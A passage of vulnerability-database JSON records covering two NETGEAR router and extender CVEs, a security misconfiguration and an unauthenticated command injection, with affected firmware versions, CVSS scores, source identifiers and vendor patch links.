"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.34_1.0.70"
},
{
"model": "ex7300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "wn2000rpt",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "wn3000rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.66"
},
{
"model": "wnr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "jnr1010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "wnr2050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.57"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d1500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
}
]
},
"cve": "CVE-2018-21231",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2018-21231",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016407",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-21231",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.1,
"id": "CVE-2018-21231",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2018-016407",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21231",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21231",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2018-016407",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2129",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-21231",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-21231"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2129"
},
{
"db": "NVD",
"id": "CVE-2018-21231"
},
{
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR An unspecified vulnerability exists in the device.Information may be obtained and tampered with. Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 prior to 1.0.0.27, D500 prior to 1.0.0.27, D6100 prior to 1.0.0.57, D6220 prior to 1.0.0.40, D6400 prior to 1.0.0.74, D7000 prior to 1.0.1.60, D7800 prior to 1.0.1.34, D8500 prior to 1.0.3.39, DGN2200v4 prior to 1.0.0.94, DGN2200Bv4 prior to 1.0.0.94, EX2700 prior to 1.0.1.42, EX3700 prior to 1.0.0.64, EX3800 prior to 1.0.0.64, EX6000 prior to 1.0.0.24, EX6100 prior to 1.0.2.18, EX6120 prior to 1.0.0.32, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.34_1.0.70, EX6200 prior to 1.0.3.82_1.1.117, EX6400 prior to 1.0.1.78, EX7000 prior to 1.0.0.56, EX7300 prior to 1.0.1.78, JNR1010v2 prior to 1.1.0.42, JR6150 prior to 1.0.1.10, JWNR2010v5 prior to 1.1.0.42, PR2000 prior to 1.0.0.22, R6050 prior to 1.0.1.10, R6100 prior to 1.0.1.16, R6220 prior to 1.1.0.50, R6250 prior to 1.0.4.14, R6300v2 prior to 1.0.4.12, R6400v2 prior to 1.0.2.34, R6700 prior to 1.0.1.26, R6900 prior to 1.0.1.26, R6900P prior to 1.2.0.22, R7000 prior to 1.0.9.6, R7000P prior to 1.2.0.22, R7100LG prior to 1.0.0.40, R7300DST prior to 1.0.0.54, R7500 prior to 1.0.0.110, R7500v2 prior to 1.0.3.26, R7800 prior to 1.0.2.44, R7900 prior to 1.0.1.26, R8000 prior to 1.0.3.48, R8300 prior to 1.0.2.104, R8500 prior to 1.0.2.104, R9000 prior to 1.0.3.10, WN2000RPTv3 prior to 1.0.1.26, WN2500RPv2 prior to 1.0.1.46, WN3000RPv3 prior to 1.0.2.66, WN3100RPv2 prior to 1.0.0.56, WNDR3400v3 prior to 1.0.1.14, WNDR3700v4 prior to 1.0.2.96, WNDR3700v5 prior to 1.1.0.54, WNDR4300 prior to 1.0.2.98, WNDR4300v2 prior to 1.0.0.48, WNDR4500v3 prior to 1.0.0.48, WNR1000v4 prior to 1.1.0.42, WNR2000v5 prior to 1.0.0.64, WNR2020 prior to 1.1.0.42, and WNR2050 prior to 1.1.0.42",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"db": "VULMON",
"id": "CVE-2018-21231"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21231",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016407",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2129",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-21231",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-21231"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2129"
},
{
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"id": "VAR-202004-1636",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4058950425581395
},
"last_update_date": "2024-11-23T23:11:26.757000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Security Misconfiguration on Some Routers, Gateways, and Extenders, PSV-2016-0102",
"trust": 0.8,
"url": "https://kb.netgear.com/000055103/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0102"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117052"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2129"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000055103/security-advisory-for-security-misconfiguration-on-some-routers-gateways-and-extenders-psv-2016-0102"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21231"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21231"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-21231"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2129"
},
{
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2018-21231"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2129"
},
{
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21231"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2129"
},
{
"date": "2020-04-24T15:15:13.003000",
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-01T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21231"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016407"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2129"
},
{
"date": "2024-11-21T04:03:14.407000",
"db": "NVD",
"id": "CVE-2018-21231"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2129"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016407"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2129"
}
],
"trust": 0.6
}
}
var-202004-1649
Vulnerability from variot
Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D6400 before 1.0.0.78, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.8, R6300v2 before 1.0.4.6, R6400 before 1.0.1.12, R6700 before 1.0.1.16, R7000 before 1.0.7.10, R7100LG before 1.0.0.42, R7300DST before 1.0.0.44, R7900 before 1.0.1.12, R8000 before 1.0.3.36, R8300 before 1.0.2.74, R8500 before 1.0.2.74, WNDR3400v3 before 1.0.1.14, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR On the device OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000 etc. are all products of NETGEAR company. NETGEAR EX7000 is a wireless network signal extender. NETGEAR R8500 is a wireless router. NETGEAR D6400 is a wireless modem. The vulnerability stems from the fact that the network system or product does not correctly filter the special characters, commands, etc. in the process of constructing the executable command of the operating system by external input data. Attackers can use this vulnerability to execute illegal operating system commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1649",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.6"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "v2 1.0.4.6"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.6"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.48"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7100lg_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7300dst_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
}
]
},
"cve": "CVE-2018-21162",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-21162",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016416",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-50928",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-21162",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-21162",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2018-016416",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21162",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21162",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2018-016416",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2021-50928",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2035",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50928"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016416"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2035"
},
{
"db": "NVD",
"id": "CVE-2018-21162"
},
{
"db": "NVD",
"id": "CVE-2018-21162"
}
]
},
"description": {
"@context": {
